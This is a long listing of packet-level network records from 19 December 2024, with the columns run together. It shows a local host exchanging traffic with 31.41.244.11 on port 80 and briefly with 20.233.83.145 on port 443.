                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.355988979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.356050014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.356897116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.356964111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.357070923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.358032942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.358058929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.358145952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.359138966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.359296083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.360073090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.360270023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.360367060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.360548973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.361358881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.361375093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.361434937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.362466097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.362482071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.362541914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.363688946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.363703966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.363755941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.364718914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.364995956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.387831926 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.387887001 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.388053894 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.399454117 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.399483919 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.498887062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.498908043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.498974085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.499387980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.499443054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.499443054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.499505997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.500402927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.500480890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.500530005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.500585079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.501491070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.501568079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.502405882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.502628088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.502758026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.502789021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.502921104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.503875971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.503994942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.504103899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.504844904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.504988909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.505031109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.505031109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.506037951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.506053925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.506105900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.506105900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.507091045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.507106066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.507167101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.507167101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.508143902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.508251905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.508280993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.508325100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.509282112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.509356022 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.509377003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.509449005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.510392904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.510462046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.510488033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.510536909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.511492968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.511554003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.511574984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.511682034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.512604952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.512667894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.512695074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.512763023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.513730049 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.513787031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.513818026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.513880014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.514822006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.514869928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.514898062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.514945984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.515968084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.516041994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.516077042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.516143084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.517051935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.517107964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.517122984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.517167091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.518148899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.518214941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.518249035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.518412113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.519248009 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.519335032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.519364119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.519428015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.520340919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.520431042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.520457983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.520510912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.521471024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.521574974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.521610022 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.521792889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.522535086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.522624969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.522661924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.522737026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.523653984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.523854971 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.523889065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.524066925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.524751902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.524849892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.524923086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.525897026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.525947094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.525985956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.526051998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.527014971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.527124882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.527127028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.527293921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.528069973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.528151035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.528182983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.528225899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.529220104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.529267073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.529345989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.529397964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.530316114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.530419111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.530426025 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.530473948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.531413078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.531462908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.531500101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.531547070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.532516956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.532612085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.532630920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.532680988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.533644915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.533693075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.533787012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.533823013 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.534727097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.534826040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.534854889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.534913063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.535849094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.535967112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.536010981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.536075115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.536974907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.537045956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.537069082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.537226915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.538095951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.538141966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.538142920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.538208008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.539179087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.539235115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.539237976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.539295912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.540258884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.540304899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.540391922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.540458918 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.541382074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.541440010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.541488886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.541568995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.542490005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.542579889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.542633057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.542723894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.543647051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.543715000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.543713093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.543829918 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.544703007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.544755936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.544794083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.544853926 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.545799971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.545846939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.545872927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.545941114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.546987057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.547030926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.547065973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.548032999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.548089027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.548114061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.548202038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.549148083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.549221039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.549249887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.549323082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.550216913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.550276041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.550347090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.550403118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.551340103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.551409006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.551441908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.551614046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.552505016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.552557945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.552587032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.552604914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.553574085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.553617001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.553663969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.553725004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.554639101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.554857016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.554887056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.554946899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.555814981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.556005955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.556019068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.556077957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.556835890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.557076931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.690973043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.691102028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.691171885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.691329002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.691530943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.691628933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.691759109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.692178965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.692667961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.693141937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.693159103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.693370104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.694212914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.694318056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.694379091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.695295095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.695353985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.695368052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.695458889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.696382046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.696444035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.696680069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.696755886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.697580099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.697596073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.697654963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.698632956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.698649883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.698692083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.698692083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.699696064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.699763060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.699801922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.699883938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.700839996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.700973034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.700997114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.701052904 CET4986080192.168.2.431.41.244.11
